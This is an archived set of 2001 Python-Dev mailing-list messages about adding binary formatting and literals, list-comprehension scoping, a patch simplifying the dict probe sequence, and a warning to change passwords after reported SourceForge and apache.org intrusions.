Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documentation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr@thyrsus.com Wed May 30 23:03:41 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()? Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry@digicool.com Wed May 30 23:05:37 2001 From: barry@digicool.com (Barry A.
Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one@home.com Wed May 30 23:17:42 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one@home.com Wed May 30 23:29:33 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr@thyrsus.com Wed May 30 23:38:33 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? 
In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr@thyrsus.com Wed May 30 23:39:43 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. string->int is happy with any base in 2..36 inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. 
Otherwise they will win and the decent people will lose. -- James Earl Jones From nas@python.ca Wed May 30 23:38:58 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas@xs4all.net Thu May 31 02:52:48 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant spouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus!
copy me into your .signature file to help me spread! From tim.one@home.com Thu May 31 04:53:53 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.96 diff -c -r2.96 dictobject.c *** Objects/dictobject.c 2001/05/27 07:39:22 2.96 --- Objects/dictobject.c 2001/05/31 03:29:23 *************** *** 85,123 **** iteration.
*/ - static long polys[] = { - /* 4 + 3, */ /* first active entry if MINSIZE == 4 */ - 8 + 3, /* first active entry if MINSIZE == 8 */ - 16 + 3, - 32 + 5, - 64 + 3, - 128 + 3, - 256 + 29, - 512 + 17, - 1024 + 9, - 2048 + 5, - 4096 + 83, - 8192 + 27, - 16384 + 43, - 32768 + 3, - 65536 + 45, - 131072 + 9, - 262144 + 39, - 524288 + 39, - 1048576 + 9, - 2097152 + 5, - 4194304 + 3, - 8388608 + 33, - 16777216 + 27, - 33554432 + 9, - 67108864 + 71, - 134217728 + 39, - 268435456 + 9, - 536870912 + 5, - 1073741824 + 83 - /* 2147483648 + 9 -- if we ever boost this to unsigned long */ - }; - /* Object used as dummy key to fill deleted entries */ static PyObject *dummy; /* Initialized by first call to newdictobject() */ --- 85,90 ---- *************** *** 168,174 **** int ma_fill; /* # Active + # Dummy */ int ma_used; /* # Active */ int ma_size; /* total # slots in ma_table */ - int ma_poly; /* appopriate entry from polys vector */ /* ma_table points to ma_smalltable for small tables, else to * additional malloc'ed memory. ma_table is never NULL! This rule * saves repeated runtime null-tests in the workhorse getitem and --- 135,140 ---- *************** *** 202,209 **** (mp)->ma_table = (mp)->ma_smalltable; \ (mp)->ma_size = MINSIZE; \ (mp)->ma_used = (mp)->ma_fill = 0; \ - (mp)->ma_poly = polys[0]; \ - assert(MINSIZE < (mp)->ma_poly && (mp)->ma_poly < MINSIZE*2); \ } while(0) PyObject * --- 168,173 ---- *************** *** 252,257 **** --- 216,240 ---- a dictentry* for which the me_value field is NULL. Exceptions are never reported by this function, and outstanding exceptions are maintained.
*/ + + /* #define DUMP_HASH_STUFF */ + #ifdef DUMP_HASH_STUFF + static int nEntry = 0, nCollide = 0, nTrip = 0; + #define BUMP_ENTRY ++nEntry + #define BUMP_COLLIDE ++nCollide + #define BUMP_TRIP ++nTrip + #define PRINT_HASH_STUFF \ + if ((nEntry & 0x1ff) == 0) \ + fprintf(stderr, "%d %d %d\n", nEntry, nCollide, nTrip) + + #else + #define BUMP_ENTRY + #define BUMP_COLLIDE + #define BUMP_TRIP + #define PRINT_HASH_STUFF + #endif + + static dictentry * lookdict(dictobject *mp, PyObject *key, register long hash) { *************** *** 265,270 **** --- 248,254 ---- register int checked_error = 0; register int cmp; PyObject *err_type, *err_value, *err_tb; + BUMP_ENTRY; /* We must come up with (i, incr) such that 0 <= i < ma_size and 0 < incr < ma_size and both are a function of hash. i is the initial table index and incr the initial probe offset. */ *************** *** 294,309 **** } freeslot = NULL; } ! /* Derive incr from hash, just to make it more arbitrary. Note that ! incr must not be 0, or we will get into an infinite loop.*/ ! incr = hash ^ ((unsigned long)hash >> 3); ! /* In the loop, me_key == dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! if (!incr) ! incr = 1; /* and incr will never be 0 again */ ! ep = &ep0[(i + incr) & mask]; if (ep->me_key == NULL) { if (restore_error) PyErr_Restore(err_type, err_value, err_tb); --- 278,292 ---- } freeslot = NULL; } ! incr = hash; ! BUMP_COLLIDE; /* In the loop, me_key == dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! BUMP_TRIP; ! i = (i << 2) + i + (incr & 0xf) + 1; ! incr >>= 4; ! ep = &ep0[i & mask]; if (ep->me_key == NULL) { if (restore_error) PyErr_Restore(err_type, err_value, err_tb); *************** *** 335,344 **** } else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; - /* Cycle through GF(2**n).
*/ - if (incr & 1) - incr ^= mp->ma_poly; /* clears the lowest bit */ - incr >>= 1; } } --- 318,323 ---- *************** *** 370,375 **** --- 349,356 ---- mp->ma_lookup = lookdict; return lookdict(mp, key, hash); } + BUMP_ENTRY; + PRINT_HASH_STUFF; /* We must come up with (i, incr) such that 0 <= i < ma_size and 0 < incr < ma_size and both are a function of hash */ i = hash & mask; *************** *** 387,400 **** } /* Derive incr from hash, just to make it more arbitrary. Note that incr must not be 0, or we will get into an infinite loop.*/ ! incr = hash ^ ((unsigned long)hash >> 3); ! /* In the loop, me_key == dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! if (!incr) ! incr = 1; /* and incr will never be 0 again */ ! ep = &ep0[(i + incr) & mask]; if (ep->me_key == NULL) return freeslot == NULL ? ep : freeslot; if (ep->me_key == key --- 368,382 ---- } /* Derive incr from hash, just to make it more arbitrary. Note that incr must not be 0, or we will get into an infinite loop.*/ ! incr = hash; ! BUMP_COLLIDE; /* In the loop, me_key == dummy is by far (factor of 100s) the least likely outcome, so test for that last. */ for (;;) { ! BUMP_TRIP; ! i = (i << 2) + i + (incr & 0xf) + 1; ! incr >>= 4; ! ep = &ep0[i & mask]; if (ep->me_key == NULL) return freeslot == NULL ? ep : freeslot; if (ep->me_key == key *************** *** 404,413 **** return ep; if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; - /* Cycle through GF(2**n). */ - if (incr & 1) - incr ^= mp->ma_poly; /* clears the lowest bit */ - incr >>= 1; } } --- 386,391 ---- *************** *** 448,454 **** static int dictresize(dictobject *mp, int minused) { ! int newsize, newpoly; dictentry *oldtable, *newtable, *ep; int i; int is_oldtable_malloced; --- 426,432 ---- static int dictresize(dictobject *mp, int minused) { !
int newsize; dictentry *oldtable, *newtable, *ep; int i; int is_oldtable_malloced; *************** *** 456,475 **** assert(minused >= 0); ! /* Find the smallest table size > minused, and its poly[] entry. */ ! newpoly = 0; ! newsize = MINSIZE; ! for (i = 0; i < sizeof(polys)/sizeof(polys[0]); ++i) { ! if (newsize > minused) { ! newpoly = polys[i]; ! break; ! } ! newsize <<= 1; ! if (newsize < 0) /* overflow */ ! break; ! } ! if (newpoly == 0) { ! /* Ran out of polynomials or newsize overflowed. */ PyErr_NoMemory(); return -1; } --- 434,445 ---- assert(minused >= 0); ! /* Find the smallest table size > minused. */ ! for (newsize = MINSIZE; ! newsize <= minused && newsize >= 0; ! newsize <<= 1) ! ; ! if (newsize < 0) { PyErr_NoMemory(); return -1; } *************** *** 511,517 **** mp->ma_table = newtable; mp->ma_size = newsize; memset(newtable, 0, sizeof(dictentry) * newsize); - mp->ma_poly = newpoly; mp->ma_used = 0; i = mp->ma_fill; mp->ma_fill = 0; --- 481,486 ---- From tim.one@home.com Thu May 31 05:46:56 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about how he was out for a drive with the family, and excitedly screamed "Hey, kids! Look!
The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one@home.com Thu May 31 05:48:28 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg@cosc.canterbury.ac.nz Thu May 31 06:15:24 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that. Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:16:11 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:16:41 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 31 06:17:16 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From esr@thyrsus.com Thu May 31 07:01:54 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. 
Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one@email.msn.com Thu May 31 07:20:21 2001 From: tim_one@email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one@email.msn.com Thu May 31 07:28:04 2001 From: tim_one@email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16}, and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1.
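For concreteness, here is a rough sketch of what Greg's proposed base(x, n) conversion might look like: the inverse of int(s, n) for bases 2..36, emitting digits most significant first, which is the same order %x and %o already use. The function name and its n=2 default follow Greg's message, but the code itself is illustrative only; nobody posted an implementation to the list. (Python 2.6 and later did eventually gain a bin() builtin, 0b literals, and a "b" presentation type for str.format().)

```python
import string

# Digit alphabet for bases 2..36, the range int(s, base) accepts.
DIGITS = string.digits + string.ascii_lowercase


def base(x, n=2):
    """Render integer x in base n (hypothetical helper mirroring Greg's base(x, n)).

    Digits come out most significant first, so base(x, n) is the
    inverse of int(s, n) for 2 <= n <= 36.
    """
    if not 2 <= n <= 36:
        raise ValueError("base must be between 2 and 36")
    if x == 0:
        return "0"
    sign = "-" if x < 0 else ""
    x = abs(x)
    digits = []
    while x:
        x, r = divmod(x, n)
        digits.append(DIGITS[r])  # least significant digit is produced first
    return sign + "".join(reversed(digits))  # reverse so the MSB is on the left


print(base(45))          # 101101 (Greg's 0x2D example)
print(base(13, 3))       # 111, the inverse of Tim's int("111", 3)
print(int(base(45), 2))  # 45, a round trip through int()
```

Negative numbers get a leading minus sign in this sketch. That is a design choice made here, not something the thread settled.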
> Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal@lemburg.com Thu May 31 08:20:11 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines. In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. 
FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Thu May 31 08:33:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... 
rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid us the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Thu May 31 09:43:32 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid us the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density of, say, 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the foreseeable future -- remember power distribution and heat dissipation). Then, approximating the cubic relation between a sphere's volume and area by lopping off a power of four, we see that 2^64 64-bit words of memory would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 17 million kilometers. This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either.
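The probe scheme in Tim's patch, as quoted by Marc-Andre above, can be sketched in Python. This is an illustration, not the patch itself: `probe_sequence` and `is_full_period` are hypothetical helpers, the shift of 5 bits per step is an assumed value, and hashes are reduced to 64 unsigned bits to mimic C's unsigned arithmetic.

```python
from itertools import islice

def is_full_period(n):
    """True if i -> (5*i + 1) % n visits all n slots starting from 0."""
    seen, i = set(), 0
    for _ in range(n):
        seen.add(i)
        i = (5 * i + 1) % n
    return len(seen) == n

def probe_sequence(hash_value, table_size, shift=5):
    """Yield slot indices for a power-of-two table (sketch of the perturbed probe).

    Each step folds in more high-order hash bits via 'perturb'; once perturb
    has been shifted down to 0, the plain 5*i + 1 recurrence takes over and
    is guaranteed to reach every slot.
    """
    if table_size <= 0 or table_size & (table_size - 1):
        raise ValueError("table_size must be a power of two")
    mask = table_size - 1
    perturb = hash_value & (2**64 - 1)   # treat the hash as unsigned 64-bit
    i = perturb & mask
    while True:
        yield i
        perturb >>= shift
        i = (5 * i + 1 + perturb) & mask

print([is_full_period(2**k) for k in range(1, 6)])  # [True, True, True, True, True]
print(is_full_period(10))                           # False: 10 is not a power of two
print(list(islice(probe_sequence(hash("spam"), 8), 10)))
```

Masking with `table_size - 1` is the power-of-two equivalent of `% n`, which is why the sketch insists on power-of-two table sizes.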
There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal@lemburg.com Thu May 31 10:23:52 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density of, say, 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > foreseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm. > Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon.
